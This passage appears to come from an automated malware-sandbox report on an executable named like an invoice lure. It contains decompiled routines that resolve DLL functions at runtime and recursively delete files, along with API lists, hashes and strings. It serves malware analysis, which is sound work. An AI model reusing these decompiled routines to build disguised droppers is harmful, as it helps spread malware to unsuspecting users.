                                                										if(_t303 != 0x2d) {
                                                											L154:
                                                											_t263 = _t320 + 1;
                                                											__eflags =  *_t263 - 0x3a;
                                                											if( *_t263 != 0x3a) {
                                                												goto L162;
                                                											}
                                                											__eflags = _t303 - 0x2d;
                                                											if(_t303 == 0x2d) {
                                                												goto L162;
                                                											}
                                                											_v36 = 1;
                                                											L157:
                                                											_v12 = _t263;
                                                											__eflags = _v28 - _v24;
                                                											if(_v28 <= _v24) {
                                                												 *_v48 =  *_v48 & 0x00000000;
                                                											} else {
                                                												 *_v28 =  *_v28 & 0x00000000;
                                                												lstrcpyA(_v48, _v24);
                                                											}
                                                											goto L57;
                                                										}
                                                										_t263 = _t320 + 1;
                                                										__eflags =  *_t263 - 0x3e;
                                                										if( *_t263 != 0x3e) {
                                                											goto L154;
                                                										}
                                                										_v36 = 3;
                                                										goto L157;
                                                									}
                                                									__eflags = _t260 - 0x3a;
                                                									if(_t260 != 0x3a) {
                                                										goto L162;
                                                									}
                                                									goto L151;
                                                								}
                                                								_t268 = _t259 - 1;
                                                								__eflags = _t268;
                                                								if(_t268 == 0) {
                                                									L80:
                                                									_t304 = _t285 + 0xffffffde;
                                                									__eflags = _t304 - 0x55;
                                                									if(_t304 > 0x55) {
                                                										goto L57;
                                                									}
                                                									switch( *((intOrPtr*)(( *(_t304 + 0x72ab2259) & 0x000000ff) * 4 +  &M72AB21CD))) {
                                                										case 0:
                                                											__eax = _v24;
                                                											__edi = _v12;
                                                											while(1) {
                                                												__edi = __edi + 1;
                                                												_v12 = __edi;
                                                												__cl =  *__edi;
                                                												__eflags = __cl - __dl;
                                                												if(__cl != __dl) {
                                                													goto L132;
                                                												}
                                                												L131:
                                                												__eflags =  *(__edi + 1) - __dl;
                                                												if( *(__edi + 1) != __dl) {
                                                													L136:
                                                													 *__eax =  *__eax & 0x00000000;
                                                													__eax = E72AB1224(_v24);
                                                													__ebx = __eax;
                                                													goto L97;
                                                												}
                                                												L132:
                                                												__eflags = __cl;
                                                												if(__cl == 0) {
                                                													goto L136;
                                                												}
                                                												__eflags = __cl - __dl;
                                                												if(__cl == __dl) {
                                                													__edi = __edi + 1;
                                                													__eflags = __edi;
                                                												}
                                                												__cl =  *__edi;
                                                												 *__eax =  *__edi;
                                                												__eax = __eax + 1;
                                                												__edi = __edi + 1;
                                                												_v12 = __edi;
                                                												__cl =  *__edi;
                                                												__eflags = __cl - __dl;
                                                												if(__cl != __dl) {
                                                													goto L132;
                                                												}
                                                												goto L131;
                                                											}
                                                										case 1:
                                                											_v8 = 1;
                                                											goto L57;
                                                										case 2:
                                                											_v8 = _v8 | 0xffffffff;
                                                											goto L57;
                                                										case 3:
                                                											_v8 = _v8 & 0x00000000;
                                                											_v20 = _v20 & 0x00000000;
                                                											_v16 = _v16 + 1;
                                                											goto L85;
                                                										case 4:
                                                											__eflags = _v20;
                                                											if(_v20 != 0) {
                                                												goto L57;
                                                											}
                                                											_v12 = _v12 - 1;
                                                											__ebx = E72AB1215();
                                                											 &_v12 = E72AB1A36( &_v12);
                                                											__eax = E72AB1429(__edx, __eax, __edx, __ebx);
                                                											goto L97;
                                                										case 5:
                                                											L105:
                                                											_v20 = _v20 + 1;
                                                											goto L57;
                                                										case 6:
                                                											_push(7);
                                                											goto L123;
                                                										case 7:
                                                											_push(0x19);
                                                											goto L143;
                                                										case 8:
                                                											__eax = 0;
                                                											__eax = 1;
                                                											__eflags = 1;
                                                											goto L107;
                                                										case 9:
                                                											_push(0x15);
                                                											goto L143;
                                                										case 0xa:
                                                											_push(0x16);
                                                											goto L143;
                                                										case 0xb:
                                                											_push(0x18);
                                                											goto L143;
                                                										case 0xc:
                                                											__eax = 0;
                                                											__eax = 1;
                                                											__eflags = 1;
                                                											goto L118;
                                                										case 0xd:
                                                											__eax = 0;
                                                											__eax = 1;
                                                											__eflags = 1;
                                                											goto L109;
                                                										case 0xe:
                                                											__eax = 0;
                                                											__eax = 1;
                                                											__eflags = 1;
                                                											goto L111;
                                                										case 0xf:
                                                											__eax = 0;
                                                											__eax = 1;
                                                											__eflags = 1;
                                                											goto L122;
                                                										case 0x10:
                                                											__eax = 0;
                                                											__eax = 1;
                                                											__eflags = 1;
                                                											goto L113;
                                                										case 0x11:
                                                											_push(3);
                                                											goto L123;
                                                										case 0x12:
                                                											_push(0x17);
                                                											L143:
                                                											_pop(__ebx);
                                                											goto L98;
                                                										case 0x13:
                                                											__eax =  &_v12;
                                                											__eax = E72AB1A36( &_v12);
                                                											__ebx = __eax;
                                                											__ebx = __eax + 1;
                                                											__eflags = __ebx - 0xb;
                                                											if(__ebx < 0xb) {
                                                												__ebx = __ebx + 0xa;
                                                											}
                                                											goto L97;
                                                										case 0x14:
                                                											__ebx = 0xffffffff;
                                                											goto L98;
                                                										case 0x15:
                                                											__eax = 0;
                                                											__eflags = 0;
                                                											goto L116;
                                                										case 0x16:
                                                											__ecx = 0;
                                                											__eflags = 0;
                                                											goto L91;
                                                										case 0x17:
                                                											__eax = 0;
                                                											__eax = 1;
                                                											__eflags = 1;
                                                											goto L120;
                                                										case 0x18:
                                                											_t270 =  *(_t329 + 0x814);
                                                											__eflags = _t270 - _v16;
                                                											if(_t270 > _v16) {
                                                												_v16 = _t270;
                                                											}
                                                											_v8 = _v8 & 0x00000000;
                                                											_v20 = _v20 & 0x00000000;
                                                											_v36 - 3 = _t270 - (_v36 == 3);
                                                											if(_t270 != _v36 == 3) {
                                                												L85:
                                                												_v40 = 1;
                                                											}
                                                											goto L57;
                                                										case 0x19:
                                                											L107:
                                                											__ecx = 0;
                                                											_v8 = 2;
                                                											__ecx = 1;
                                                											goto L91;
                                                										case 0x1a:
                                                											L118:
                                                											_push(5);
                                                											goto L123;
                                                										case 0x1b:
                                                											L109:
                                                											__ecx = 0;
                                                											_v8 = 3;
                                                											__ecx = 1;
                                                											goto L91;
                                                										case 0x1c:
                                                											L111:
                                                											__ecx = 0;
                                                											__ecx = 1;
                                                											goto L91;
                                                										case 0x1d:
                                                											L122:
                                                											_push(6);
                                                											goto L123;
                                                										case 0x1e:
                                                											L113:
                                                											_push(2);
                                                											goto L123;
                                                										case 0x1f:
                                                											__eax =  &_v12;
                                                											__eax = E72AB1A36( &_v12);
                                                											__ebx = __eax;
                                                											__ebx = __eax + 1;
                                                											goto L97;
                                                										case 0x20:
                                                											L116:
                                                											_v52 = _v52 + 1;
                                                											_push(3);
                                                											_pop(__ecx);
                                                											goto L91;
                                                										case 0x21:
                                                											L120:
                                                											_push(4);
                                                											L123:
                                                											_pop(__ecx);
                                                											L91:
                                                											__edi = _v16;
                                                											__edx =  *(0x72ab305c + __ecx * 4);
                                                											__eax =  ~__eax;
                                                											asm("sbb eax, eax");
                                                											_v40 = 1;
                                                											__edi = _v16 << 5;
                                                											__eax = __eax & 0x00008000;
                                                											__edi = (_v16 << 5) + __esi;
                                                											__eax = __eax | __ecx;
                                                											__eflags = _v8;
                                                											 *(__edi + 0x818) = __eax;
                                                											if(_v8 < 0) {
                                                												L93:
                                                												__edx = 0;
                                                												__edx = 1;
                                                												__eflags = 1;
                                                												L94:
                                                												__eflags = _v8 - 1;
                                                												 *(__edi + 0x828) = __edx;
                                                												if(_v8 == 1) {
                                                													__eax =  &_v12;
                                                													__eax = E72AB1A36( &_v12);
                                                													__eax = __eax + 1;
                                                													__eflags = __eax;
                                                													_v8 = __eax;
                                                												}
                                                												__eax = _v8;
                                                												 *((intOrPtr*)(__edi + 0x81c)) = _v8;
                                                												_t136 = _v16 + 0x41; // 0x41
                                                												_t136 = _t136 << 5;
                                                												__eax = 0;
                                                												__eflags = 0;
                                                												 *((intOrPtr*)((_t136 << 5) + __esi)) = 0;
                                                												 *((intOrPtr*)(__edi + 0x830)) = 0;
                                                												 *((intOrPtr*)(__edi + 0x82c)) = 0;
                                                												L97:
                                                												__eflags = __ebx;
                                                												if(__ebx == 0) {
                                                													goto L57;
                                                												}
                                                												L98:
                                                												__eflags = _v20;
                                                												_v40 = 1;
                                                												if(_v20 != 0) {
                                                													L103:
                                                													__eflags = _v20 - 1;
                                                													if(_v20 == 1) {
                                                														__eax = _v16;
                                                														__eax = _v16 << 5;
                                                														__eflags = __eax;
                                                														 *(__eax + __esi + 0x82c) = __ebx;
                                                													}
                                                													goto L105;
                                                												}
                                                												_v16 = _v16 << 5;
                                                												_t144 = __esi + 0x830; // 0x830
                                                												__edi = (_v16 << 5) + _t144;
                                                												__eax =  *__edi;
                                                												__eflags = __eax - 0xffffffff;
                                                												if(__eax <= 0xffffffff) {
                                                													L101:
                                                													__eax = GlobalFree(__eax);
                                                													L102:
                                                													 *__edi = __ebx;
                                                													goto L103;
                                                												}
                                                												__eflags = __eax - 0x19;
                                                												if(__eax <= 0x19) {
                                                													goto L102;
                                                												}
                                                												goto L101;
                                                											}
                                                											__eflags = __edx;
                                                											if(__edx > 0) {
                                                												goto L94;
                                                											}
                                                											goto L93;
                                                										case 0x22:
                                                											goto L57;
                                                									}
                                                								}
                                                								_t271 = _t268 - 1;
                                                								__eflags = _t271;
                                                								if(_t271 == 0) {
                                                									_v16 = _t282;
                                                									goto L80;
                                                								}
                                                								__eflags = _t271 != 1;
                                                								if(_t271 != 1) {
                                                									goto L162;
                                                								}
                                                								__eflags = _t285 - 0x6e;
                                                								if(__eflags > 0) {
                                                									_t308 = _t285 - 0x72;
                                                									__eflags = _t308;
                                                									if(_t308 == 0) {
                                                										_push(4);
                                                										L74:
                                                										_pop(_t273);
                                                										L75:
                                                										__eflags = _v8 - 1;
                                                										if(_v8 != 1) {
                                                											_t96 = _t329 + 0x810;
                                                											 *_t96 =  *(_t329 + 0x810) &  !_t273;
                                                											__eflags =  *_t96;
                                                										} else {
                                                											 *(_t329 + 0x810) =  *(_t329 + 0x810) | _t273;
                                                										}
                                                										_v8 = 1;
                                                										goto L57;
                                                									}
                                                									_t311 = _t308 - 1;
                                                									__eflags = _t311;
                                                									if(_t311 == 0) {
                                                										_push(0x10);
                                                										goto L74;
                                                									}
                                                									__eflags = _t311 != 0;
                                                									if(_t311 != 0) {
                                                										goto L57;
                                                									}
                                                									_push(0x40);
                                                									goto L74;
                                                								}
                                                								if(__eflags == 0) {
                                                									_push(8);
                                                									goto L74;
                                                								}
                                                								_t314 = _t285 - 0x21;
                                                								__eflags = _t314;
                                                								if(_t314 == 0) {
                                                									_v8 =  ~_v8;
                                                									goto L57;
                                                								}
                                                								_t315 = _t314 - 0x11;
                                                								__eflags = _t315;
                                                								if(_t315 == 0) {
                                                									_t273 = 0x100;
                                                									goto L75;
                                                								}
                                                								_t316 = _t315 - 0x31;
                                                								__eflags = _t316;
                                                								if(_t316 == 0) {
                                                									_t273 = 1;
                                                									goto L75;
                                                								}
                                                								__eflags = _t316 != 0;
                                                								if(_t316 != 0) {
                                                									goto L57;
                                                								}
                                                								_push(0x20);
                                                								goto L74;
                                                							} else {
                                                								_v32 = _t282;
                                                								_v36 = _t282;
                                                								goto L20;
                                                							}
                                                						}
                                                						__eflags =  *((char*)(_t320 - 1)) - 0x3a;
                                                						if( *((char*)(_t320 - 1)) != 0x3a) {
                                                							goto L17;
                                                						}
                                                						__eflags = _v32 - _t282;
                                                						if(_v32 == _t282) {
                                                							goto L43;
                                                						}
                                                						goto L17;
                                                					}
                                                					_t276 = _t257 - 5;
                                                					if(_t276 == 0) {
                                                						__eflags = _v44 - _t282;
                                                						if(_v44 != _t282) {
                                                							goto L43;
                                                						} else {
                                                							__eflags = _v36 - 3;
                                                							_v32 = 1;
                                                							_v8 = _t282;
                                                							_v20 = _t282;
                                                							_v16 = (0 | _v36 == 0x00000003) + 1;
                                                							_v40 = _t282;
                                                							goto L20;
                                                						}
                                                					}
                                                					_t280 = _t276 - 1;
                                                					if(_t280 == 0) {
                                                						__eflags = _v44 - _t282;
                                                						if(_v44 != _t282) {
                                                							goto L43;
                                                						} else {
                                                							_v32 = 2;
                                                							_v8 = _t282;
                                                							_v20 = _t282;
                                                							goto L20;
                                                						}
                                                					}
                                                					if(_t280 != 0x16) {
                                                						goto L43;
                                                					} else {
                                                						_v32 = 3;
                                                						_v8 = 1;
                                                						goto L20;
                                                					}
                                                				}
                                                				GlobalFree(_v56);
                                                				GlobalFree(_v24);
                                                				GlobalFree(_v48);
                                                				if(_t329 == _t282 ||  *(_t329 + 0x80c) != _t282) {
                                                					L182:
                                                					return _t329;
                                                				} else {
                                                					_t224 =  *_t329 - 1;
                                                					if(_t224 == 0) {
                                                						_t187 = _t329 + 8; // 0x8
                                                						_t323 = _t187;
                                                						__eflags =  *_t323;
                                                						if( *_t323 != 0) {
                                                							_t225 = GetModuleHandleA(_t323); // executed
                                                							__eflags = _t225 - _t282;
                                                							 *(_t329 + 0x808) = _t225;
                                                							if(_t225 != _t282) {
                                                								L171:
                                                								_t192 = _t329 + 0x408; // 0x408
                                                								_t324 = _t192;
                                                								_t226 = E72AB15C2( *(_t329 + 0x808), _t324);
                                                								__eflags = _t226 - _t282;
                                                								 *(_t329 + 0x80c) = _t226;
                                                								if(_t226 == _t282) {
                                                									__eflags =  *_t324 - 0x23;
                                                									if( *_t324 == 0x23) {
                                                										_t195 = _t329 + 0x409; // 0x409
                                                										_t230 = E72AB12FE(_t195);
                                                										__eflags = _t230 - _t282;
                                                										if(_t230 != _t282) {
                                                											__eflags = _t230 & 0xffff0000;
                                                											if((_t230 & 0xffff0000) == 0) {
                                                												 *(_t329 + 0x80c) = GetProcAddress( *(_t329 + 0x808), _t230 & 0x0000ffff);
                                                											}
                                                										}
                                                									}
                                                								}
                                                								__eflags = _v52 - _t282;
                                                								if(_v52 != _t282) {
                                                									L178:
                                                									_t324[lstrlenA(_t324)] = 0x41;
                                                									_t228 = E72AB15C2( *(_t329 + 0x808), _t324);
                                                									__eflags = _t228 - _t282;
                                                									if(_t228 != _t282) {
                                                										L166:
                                                										 *(_t329 + 0x80c) = _t228;
                                                										goto L182;
                                                									}
                                                									__eflags =  *(_t329 + 0x80c) - _t282;
                                                									L180:
                                                									if(__eflags != 0) {
                                                										goto L182;
                                                									}
                                                									L181:
                                                									_t205 = _t329 + 4;
                                                									 *_t205 =  *(_t329 + 4) | 0xffffffff;
                                                									__eflags =  *_t205;
                                                									goto L182;
                                                								} else {
                                                									__eflags =  *(_t329 + 0x80c) - _t282;
                                                									if( *(_t329 + 0x80c) != _t282) {
                                                										goto L182;
                                                									}
                                                									goto L178;
                                                								}
                                                							}
                                                							_t233 = LoadLibraryA(_t323); // executed
                                                							__eflags = _t233 - _t282;
                                                							 *(_t329 + 0x808) = _t233;
                                                							if(_t233 == _t282) {
                                                								goto L181;
                                                							}
                                                							goto L171;
                                                						}
                                                						_t188 = _t329 + 0x408; // 0x408
                                                						_t235 = E72AB12FE(_t188);
                                                						 *(_t329 + 0x80c) = _t235;
                                                						__eflags = _t235 - _t282;
                                                						goto L180;
                                                					}
                                                					_t236 = _t224 - 1;
                                                					if(_t236 == 0) {
                                                						_t185 = _t329 + 0x408; // 0x408
                                                						_t237 = _t185;
                                                						__eflags =  *_t237;
                                                						if( *_t237 == 0) {
                                                							goto L182;
                                                						}
                                                						_t228 = E72AB12FE(_t237);
                                                						L165:
                                                						goto L166;
                                                					}
                                                					if(_t236 != 1) {
                                                						goto L182;
                                                					}
                                                					_t81 = _t329 + 8; // 0x8
                                                					_t283 = _t81;
                                                					_t325 = E72AB12FE(_t81);
                                                					 *(_t329 + 0x808) = _t325;
                                                					if(_t325 == 0) {
                                                						goto L181;
                                                					}
                                                					 *(_t329 + 0x84c) =  *(_t329 + 0x84c) & 0x00000000;
                                                					 *((intOrPtr*)(_t329 + 0x850)) = E72AB1224(_t283);
                                                					 *(_t329 + 0x83c) =  *(_t329 + 0x83c) & 0x00000000;
                                                					 *((intOrPtr*)(_t329 + 0x848)) = 1;
                                                					 *((intOrPtr*)(_t329 + 0x838)) = 1;
                                                					_t90 = _t329 + 0x408; // 0x408
                                                					_t228 =  *(_t325->i + E72AB12FE(_t90) * 4);
                                                					goto L165;
                                                				}
                                                			}

                                                0x72ab1df5
                                                0x72ab1c9b
                                                0x72ab1c9b
                                                0x72ab1c9c
                                                0x72ab1ddb
                                                0x00000000
                                                0x72ab1ddb
                                                0x72ab1ca2
                                                0x72ab1ca3
                                                0x00000000
                                                0x00000000
                                                0x72ab1ca9
                                                0x72ab1cac
                                                0x72ab1da0
                                                0x72ab1da0
                                                0x72ab1da3
                                                0x72ab1db8
                                                0x72ab1dba
                                                0x72ab1dba
                                                0x72ab1dbb
                                                0x72ab1dbe
                                                0x72ab1dc1
                                                0x72ab1dcd
                                                0x72ab1dcd
                                                0x72ab1dcd
                                                0x72ab1dc3
                                                0x72ab1dc3
                                                0x72ab1dc3
                                                0x72ab1dd3
                                                0x00000000
                                                0x72ab1dd3
                                                0x72ab1da5
                                                0x72ab1da5
                                                0x72ab1da6
                                                0x72ab1db4
                                                0x00000000
                                                0x72ab1db4
                                                0x72ab1da9
                                                0x72ab1daa
                                                0x00000000
                                                0x00000000
                                                0x72ab1db0
                                                0x00000000
                                                0x72ab1db0
                                                0x72ab1cb2
                                                0x72ab1d9c
                                                0x00000000
                                                0x72ab1d9c
                                                0x72ab1cb8
                                                0x72ab1cb8
                                                0x72ab1cbb
                                                0x72ab1ce4
                                                0x00000000
                                                0x72ab1ce4
                                                0x72ab1cbd
                                                0x72ab1cbd
                                                0x72ab1cc0
                                                0x72ab1cda
                                                0x00000000
                                                0x72ab1cda
                                                0x72ab1cc2
                                                0x72ab1cc2
                                                0x72ab1cc5
                                                0x72ab1cd4
                                                0x00000000
                                                0x72ab1cd4
                                                0x72ab1cc8
                                                0x72ab1cc9
                                                0x00000000
                                                0x00000000
                                                0x72ab1ccb
                                                0x00000000
                                                0x72ab1b83
                                                0x72ab1b83
                                                0x72ab1b86
                                                0x00000000
                                                0x72ab1b86
                                                0x72ab1b7d
                                                0x72ab1b6b
                                                0x72ab1b6f
                                                0x00000000
                                                0x00000000
                                                0x72ab1b71
                                                0x72ab1b74
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x72ab1b74
                                                0x72ab1b05
                                                0x72ab1b08
                                                0x72ab1b3e
                                                0x72ab1b41
                                                0x00000000
                                                0x72ab1b47
                                                0x72ab1b49
                                                0x72ab1b4d
                                                0x72ab1b54
                                                0x72ab1b5b
                                                0x72ab1b5e
                                                0x72ab1b61
                                                0x00000000
                                                0x72ab1b61
                                                0x72ab1b41
                                                0x72ab1b0a
                                                0x72ab1b0b
                                                0x72ab1b26
                                                0x72ab1b29
                                                0x00000000
                                                0x72ab1b2f
                                                0x72ab1b2f
                                                0x72ab1b36
                                                0x72ab1b39
                                                0x00000000
                                                0x72ab1b39
                                                0x72ab1b29
                                                0x72ab1b10
                                                0x00000000
                                                0x72ab1b16
                                                0x72ab1b16
                                                0x72ab1b1d
                                                0x00000000
                                                0x72ab1b1d
                                                0x72ab1b10
                                                0x72ab1d09
                                                0x72ab1d0e
                                                0x72ab1d13
                                                0x72ab1d17
                                                0x72ab21c6
                                                0x72ab21cc
                                                0x72ab1d29
                                                0x72ab1d2b
                                                0x72ab1d2c
                                                0x72ab20f1
                                                0x72ab20f1
                                                0x72ab20f4
                                                0x72ab20f7
                                                0x72ab2114
                                                0x72ab211a
                                                0x72ab211c
                                                0x72ab2122
                                                0x72ab2139
                                                0x72ab2139
                                                0x72ab2139
                                                0x72ab2146
                                                0x72ab214c
                                                0x72ab214f
                                                0x72ab2155
                                                0x72ab2157
                                                0x72ab215a
                                                0x72ab215c
                                                0x72ab2163
                                                0x72ab2168
                                                0x72ab216b
                                                0x72ab216d
                                                0x72ab2172
                                                0x72ab2184
                                                0x72ab2184
                                                0x72ab2172
                                                0x72ab216b
                                                0x72ab215a
                                                0x72ab218a
                                                0x72ab218d
                                                0x72ab2197
                                                0x72ab219f
                                                0x72ab21ab
                                                0x72ab21b1
                                                0x72ab21b4
                                                0x72ab20e6
                                                0x72ab20e6
                                                0x00000000
                                                0x72ab20e6
                                                0x72ab21ba
                                                0x72ab21c0
                                                0x72ab21c0
                                                0x00000000
                                                0x00000000
                                                0x72ab21c2
                                                0x72ab21c2
                                                0x72ab21c2
                                                0x72ab21c2
                                                0x00000000
                                                0x72ab218f
                                                0x72ab218f
                                                0x72ab2195
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x72ab2195
                                                0x72ab218d
                                                0x72ab2125
                                                0x72ab212b
                                                0x72ab212d
                                                0x72ab2133
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x72ab2133
                                                0x72ab20f9
                                                0x72ab2100
                                                0x72ab2106
                                                0x72ab210c
                                                0x00000000
                                                0x72ab210c
                                                0x72ab1d32
                                                0x72ab1d33
                                                0x72ab20d0
                                                0x72ab20d0
                                                0x72ab20d6
                                                0x72ab20d9
                                                0x00000000
                                                0x00000000
                                                0x72ab20e0
                                                0x72ab20e5
                                                0x00000000
                                                0x72ab20e5
                                                0x72ab1d3a
                                                0x00000000
                                                0x00000000
                                                0x72ab1d40
                                                0x72ab1d40
                                                0x72ab1d49
                                                0x72ab1d4e
                                                0x72ab1d54
                                                0x00000000
                                                0x00000000
                                                0x72ab1d5a
                                                0x72ab1d67
                                                0x72ab1d6d
                                                0x72ab1d77
                                                0x72ab1d7d
                                                0x72ab1d85
                                                0x72ab1d95
                                                0x00000000
                                                0x72ab1d95

                                                APIs
                                                  • Part of subcall function 72AB1215: GlobalAlloc.KERNEL32(00000040,72AB1233,?,72AB12CF,-72AB404B,72AB11AB,-000000A0), ref: 72AB121D
                                                • GlobalAlloc.KERNELBASE(00000040,000014A4), ref: 72AB1BC4
                                                • lstrcpyA.KERNEL32(00000008,?), ref: 72AB1C0C
                                                • lstrcpyA.KERNEL32(00000408,?), ref: 72AB1C16
                                                • GlobalFree.KERNEL32 ref: 72AB1C29
                                                • GlobalFree.KERNEL32 ref: 72AB1D09
                                                • GlobalFree.KERNEL32 ref: 72AB1D0E
                                                • GlobalFree.KERNEL32 ref: 72AB1D13
                                                • GlobalFree.KERNEL32 ref: 72AB1EFA
                                                • lstrcpyA.KERNEL32(?,?), ref: 72AB2098
                                                • GetModuleHandleA.KERNELBASE(00000008), ref: 72AB2114
                                                • LoadLibraryA.KERNELBASE(00000008), ref: 72AB2125
                                                • GetProcAddress.KERNEL32(?,?), ref: 72AB217E
                                                • lstrlenA.KERNEL32(00000408), ref: 72AB2198
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.688800351.0000000072AB1000.00000020.00020000.sdmp, Offset: 72AB0000, based on PE: true
                                                • Associated: 00000000.00000002.688792553.0000000072AB0000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.688807982.0000000072AB3000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.688815540.0000000072AB5000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                • String ID:
                                                • API String ID: 245916457-0
                                                • Opcode ID: d7217c196c38e042e81e34db26df840ab26120019aba83ee4b84b34b0154c62a
                                                • Instruction ID: 3c635702332e9ff0b68cb8b190aabb7369e31858fbc5af8ab08f97b663e10427
                                                • Opcode Fuzzy Hash: d7217c196c38e042e81e34db26df840ab26120019aba83ee4b84b34b0154c62a
                                                • Instruction Fuzzy Hash: 6E22AD71D00249DFDB118FACC9847AEBBFAFF09305F10552ED196A6198D7785A82CF90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 98%
                                                			E0040589C(void* __eflags, signed int _a4, signed int _a8) {
                                                				signed int _v8;
                                                				void* _v12;
                                                				signed int _v16;
                                                				struct _WIN32_FIND_DATAA _v336;
                                                				signed int _t40;
                                                				char* _t53;
                                                				signed int _t55;
                                                				signed int _t58;
                                                				signed int _t64;
                                                				signed int _t66;
                                                				void* _t68;
                                                				signed char _t69;
                                                				CHAR* _t71;
                                                				void* _t72;
                                                				CHAR* _t73;
                                                				char* _t76;
                                                
                                                				_t69 = _a8;
                                                				_t73 = _a4;
                                                				_v8 = _t69 & 0x00000004;
                                                				_t40 = E00405B5A(__eflags, _t73);
                                                				_v16 = _t40;
                                                				if((_t69 & 0x00000008) != 0) {
                                                					_t66 = DeleteFileA(_t73); // executed
                                                					asm("sbb eax, eax");
                                                					_t68 =  ~_t66 + 1;
                                                					 *0x7a3008 =  *0x7a3008 + _t68;
                                                					return _t68;
                                                				}
                                                				_a4 = _t69;
                                                				_t8 =  &_a4;
                                                				 *_t8 = _a4 & 0x00000001;
                                                				__eflags =  *_t8;
                                                				if( *_t8 == 0) {
                                                					L5:
                                                					E004060D4(0x7a0570, _t73);
                                                					__eflags = _a4;
                                                					if(_a4 == 0) {
                                                						E00405AB3(_t73);
                                                					} else {
                                                						lstrcatA(0x7a0570, "\*.*");
                                                					}
                                                					__eflags =  *_t73;
                                                					if( *_t73 != 0) {
                                                						L10:
                                                						lstrcatA(_t73, 0x40a014);
                                                						L11:
                                                						_t71 =  &(_t73[lstrlenA(_t73)]);
                                                						_t40 = FindFirstFileA(0x7a0570,  &_v336);
                                                						__eflags = _t40 - 0xffffffff;
                                                						_v12 = _t40;
                                                						if(_t40 == 0xffffffff) {
                                                							L29:
                                                							__eflags = _a4;
                                                							if(_a4 != 0) {
                                                								_t32 = _t71 - 1;
                                                								 *_t32 =  *(_t71 - 1) & 0x00000000;
                                                								__eflags =  *_t32;
                                                							}
                                                							goto L31;
                                                						} else {
                                                							goto L12;
                                                						}
                                                						do {
                                                							L12:
                                                							_t76 =  &(_v336.cFileName);
                                                							_t53 = E00405A97( &(_v336.cFileName), 0x3f);
                                                							__eflags =  *_t53;
                                                							if( *_t53 != 0) {
                                                								__eflags = _v336.cAlternateFileName;
                                                								if(_v336.cAlternateFileName != 0) {
                                                									_t76 =  &(_v336.cAlternateFileName);
                                                								}
                                                							}
                                                							__eflags =  *_t76 - 0x2e;
                                                							if( *_t76 != 0x2e) {
                                                								L19:
                                                								E004060D4(_t71, _t76);
                                                								__eflags = _v336.dwFileAttributes & 0x00000010;
                                                								if(__eflags == 0) {
                                                									_t55 = E00405854(__eflags, _t73, _v8);
                                                									__eflags = _t55;
                                                									if(_t55 != 0) {
                                                										E004051FB(0xfffffff2, _t73);
                                                									} else {
                                                										__eflags = _v8 - _t55;
                                                										if(_v8 == _t55) {
                                                											 *0x7a3008 =  *0x7a3008 + 1;
                                                										} else {
                                                											E004051FB(0xfffffff1, _t73);
                                                											E00405EB3(_t72, _t73, 0);
                                                										}
                                                									}
                                                								} else {
                                                									__eflags = (_a8 & 0x00000003) - 3;
                                                									if(__eflags == 0) {
                                                										E0040589C(__eflags, _t73, _a8);
                                                									}
                                                								}
                                                								goto L27;
                                                							}
                                                							_t64 =  *((intOrPtr*)(_t76 + 1));
                                                							__eflags = _t64;
                                                							if(_t64 == 0) {
                                                								goto L27;
                                                							}
                                                							__eflags = _t64 - 0x2e;
                                                							if(_t64 != 0x2e) {
                                                								goto L19;
                                                							}
                                                							__eflags =  *((char*)(_t76 + 2));
                                                							if( *((char*)(_t76 + 2)) == 0) {
                                                								goto L27;
                                                							}
                                                							goto L19;
                                                							L27:
                                                							_t58 = FindNextFileA(_v12,  &_v336);
                                                							__eflags = _t58;
                                                						} while (_t58 != 0);
                                                						_t40 = FindClose(_v12);
                                                						goto L29;
                                                					}
                                                					__eflags =  *0x7a0570 - 0x5c;
                                                					if( *0x7a0570 != 0x5c) {
                                                						goto L11;
                                                					}
                                                					goto L10;
                                                				} else {
                                                					__eflags = _t40;
                                                					if(_t40 == 0) {
                                                						L31:
                                                						__eflags = _a4;
                                                						if(_a4 == 0) {
                                                							L39:
                                                							return _t40;
                                                						}
                                                						__eflags = _v16;
                                                						if(_v16 != 0) {
                                                							_t40 = E00406448(_t73);
                                                							__eflags = _t40;
                                                							if(_t40 == 0) {
                                                								goto L39;
                                                							}
                                                							E00405A6C(_t73);
                                                							_t40 = E00405854(__eflags, _t73, _v8 | 0x00000001);
                                                							__eflags = _t40;
                                                							if(_t40 != 0) {
                                                								return E004051FB(0xffffffe5, _t73);
                                                							}
                                                							__eflags = _v8;
                                                							if(_v8 == 0) {
                                                								goto L33;
                                                							}
                                                							E004051FB(0xfffffff1, _t73);
                                                							return E00405EB3(_t72, _t73, 0);
                                                						}
                                                						L33:
                                                						 *0x7a3008 =  *0x7a3008 + 1;
                                                						return _t40;
                                                					}
                                                					__eflags = _t69 & 0x00000002;
                                                					if((_t69 & 0x00000002) == 0) {
                                                						goto L31;
                                                					}
                                                					goto L5;
                                                				}
                                                			}




















                                                APIs
                                                • DeleteFileA.KERNELBASE(?,?,73BCFA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058C5
                                                • lstrcatA.KERNEL32(007A0570,\*.*,007A0570,?,?,73BCFA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040590D
                                                • lstrcatA.KERNEL32(?,0040A014,?,007A0570,?,?,73BCFA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040592E
                                                • lstrlenA.KERNEL32(?,?,0040A014,?,007A0570,?,?,73BCFA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405934
                                                • FindFirstFileA.KERNEL32(007A0570,?,?,?,0040A014,?,007A0570,?,?,73BCFA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405945
                                                • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 004059F2
                                                • FindClose.KERNEL32(00000000), ref: 00405A03
                                                Strings
                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 004058A9
                                                • \*.*, xrefs: 00405907
                                                • "C:\Users\user\Desktop\Invoice 6500TH21Y5674.exe" , xrefs: 0040589C
                                                Memory Dump Source
